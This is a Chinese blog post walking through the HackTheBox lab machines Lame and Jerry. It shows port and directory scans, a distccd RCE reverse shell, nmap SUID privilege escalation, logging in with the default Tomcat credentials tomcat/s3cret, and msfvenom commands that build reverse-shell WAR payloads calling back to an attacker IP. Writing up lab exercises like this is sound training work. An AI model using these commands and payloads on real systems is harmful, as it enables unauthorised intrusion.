HackTheBox-Lame&Jerry渗透测试

最新推荐文章于 2023-01-31 18:25:31 发布
最新推荐文章于 2023-01-31 18:25:31 发布
阅读量184 收藏
点赞数
分类专栏: 靶机测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43111940/article/details/115680167
版权

Lame

端口扫描

sudo nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3

在这里插入图片描述
发现了ftp和smb服务
匿名登录一下ftp

在这里插入图片描述
没有什么东西
查找smb服务的exp

searchslpoit smb

在这里插入图片描述
这里可以用msf打
由于在OSCP的进攻方认证考试中只允许对一台主机用msf,所以在测试的时候尽量避免用msf(直接用msf很low)
用的是distccd的脚本,搜索distccd exploit
找到对应的脚本

https://gist.github.com/DarkCoderS/4dbf6229a93e75c3bdf6b467e67a9855

这里介绍了运行方式是利用RCE漏洞反弹shell

在这里插入图片描述
kali开启监听,拿到user权限

在这里插入图片描述
进入daemon@lame:/home/makis$ 拿到user.txt提交
上传LinEnum.sh的脚本
kali开启服务,靶机下载

在这里插入图片描述
发现nmap可以用suid提权,搜索nmap privilege escalation

在这里插入图片描述
运行

nmap --interactive

h查看帮助

在这里插入图片描述
在这里插入图片描述

jerry

端口(服务器延迟很高,就不挨个扫端口了)

sudo nmap -sC -sV -p 8080 10.10.10.95

在这里插入图片描述
目录扫描

gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt

在这里插入图片描述
发现一个http的认证登录,直接搜tomcat default password看能不能弱口令梭哈

https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

发现用户名和密码分别是tomcat,s3cret

在这里插入图片描述
可以上传war包拿shell
用msfvenom生成war文件

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.5 lport=9001 -f war -o shell.war

kali开启监听
访问之后拿到shell,whoami查看权限,可以看到是system权限

在这里插入图片描述
另一种姿势拿shell
上传war包
直接用网上的或者

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=9001 -f war -o shell2.war

访问shell2文件夹,会报出404的错误

在这里插入图片描述
这里需要访问shell2里面打包的jsp文件路径,也就是

在这里插入图片描述
而且这里开启监听也不能用nc命令,需要msf里用handler

在这里插入图片描述
从网上打包的war包同理

在这里插入图片描述

总结起来没什么难点,很基础的靶机。

fHack1r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
node-lame:Node.js与libmp3lame和libmpg123的本机绑定
04-13
节点层 NodeJS与libmp3lame和libmpg123的本机绑定 对于您所有的异步MP3流编码/解码需求,这里都有node-lame ! 该模块连接到lame命令使用的库libmp3lame...// create the Encoder instance var encoder = new lame . E
HackTheBox 连接加速方案
weixin_41564828的博客
02-02 1155
hackthebox加速
解决hack the box国内访问慢的问题
zr1213159840的博客
05-02 5119
今晚打开靶机使用nmap扫描,实在太慢了,而且靶机的ping一直居不下,以前可能会选择切换节点试试,但是一般切了后,还是会出现这种情况,主要是国内的网络环境有点“复杂”。 接着 然后 注意: hack the box官网有相应的建议,但是我切换了,不好使,建议如下: ...
Hack The Box靶场练习之Lame
qq_44767905的博客
01-31 427
HTB-----Lame
Hack The Box::Lame
aya3t的博客
10-10 327
Hack The Box::Lame
hack the box jerry靶机
zr1213159840的博客
04-14 925
打开靶机,扫一下看看有什么东西。能看到是存在一个8080端口,tomcat,apache等信息 nmap -sV -Pn -A 10.10.10.95 这个机器给了提示,说什么远程命令执行,什么文件上传之类的。我感觉使用msf或许可以。于是打开msf进去搜索了一下。能看到确实有上传相关的漏洞。 search apache tomcat 这下好了,直接利用就好了,哈哈哈哈。 首先配置远程主机为10.10.10.95,配置远程端口为8080,然后直接run!不出意外直接没用,非常尴尬。 接着看了一下漏
project-lame.zip
05-16
NDK实现PCM转MP3,使用的是C语言Lame库,包含完整的C代码,通过JNA来调用so库,代码很简洁
cpp-lame编码引擎将PCM转为MP3
08-16
lame编码引擎,将PCM转为MP3
Antisymmetric-part-of-the-Lame-wave.rar_matlab例程_matlab_
08-11
Lame波反对称部分的基本模态的matlab 程序
IOS-lame静态库
11-15
lame静态库打包,拖入工程里面即可,不用配置别的东西
Hackthebox------Jerry
大方子
11-24 3012
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
jerry yue_如何从hackthebox入侵jerry
weixin_26636643的博客
09-27 518
jerry yue 介绍 (Introduction) Welcome to my third article. Today we will be looking at Jerry from HackTheBox. This is a realistic and very easy box. The article will again be similar to my first and sec...
No.60-HackTheBox-windows-Jerry-Walkthrough渗透学习
qq_34801745的博客
02-25 311
** HackTheBox-windows-Jerry-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/144 靶机难度:初级(4.0/10) 靶机发布日期:2018年11月11日 靶机描述: Although Jerry is one of the easier machines on Hack The Bo...
hackthebox-Jerry(考点:tomcat安全/windows)
冬萍子癸水
04-16 405
nmap 就8080,扫描结果显示是tom猫 网上有很多方法,把tom猫按在地上摩擦。。。这个 先传统方法。进去,上传 dirbuster搜到manager登录页面 不知道密码,那么想法找密码,但是如果此时点了取消登录框cancel,密码就自动出来了。。。。。。。。额 或者kali自带的破解tom的字典,在这里 然后用这个小脚本自动跑 #!/usr/bin/env python impor...
【Hack The Box】windows练习-- jerry
人间体佐菲的博客
10-31 172
【Hack The Box】windows练习-- jerry
[Hack The Box]靶机4 Jerry
Huamang的博客
03-29 496
首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat 给出的是默认界面 dirmap扫描了一下目录 去manager管理页面看看,他需要认证 他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破 进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点 use exploit/multi/http/tomcat_mgr_upload 直接打通 在Administrator的桌面发现flag cd C:.
Hackthebox:Jerry Walkthrough(not use metasploit)
汗的博客
12-19 651
Jerry是一个Windows系统的Hackthebox靶机,主要和tomcat有关,本walkthrough未使用msf
HackTheBox::Jerry
aya3t的博客
10-12 184
HackTheBox::Jerry
Hack the box靶机 Jerry
菜浪马废的博客
05-27 361
需要账户 ??????? 老子就点了个取消 你把密码都给我了? tomcat:s3cret 登录完还是这个 再找找其他的 /manage可以登录进来 可以上传文件 需要点一下我上传的shell 才能连接 查看有空格的文件名的时候 用“”把文件名括起来就可以查看了 白天不知道因为什么心烦 没怎么学习 随便翻了翻linux的缓冲区 还有一个htb上win的简单的题 还得努力啊 离着月薪三万还差得远呢 加油! ...
那我在 Rarewares 网站:http://www.rarewares.org/mp3-lame-bundle.php 下载的lame库文件有什么用?
最新发布
06-09
在 Rarewares 网站下载的 LAME 库文件可以用于在 Windows 平台上使用现成的 LAME 库,而不需要自己编译生成库文件和头文件。这个 LAME 库文件包含了预编译的 LAME 库和 DLL 文件,可以直接在 Windows 系统上使用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值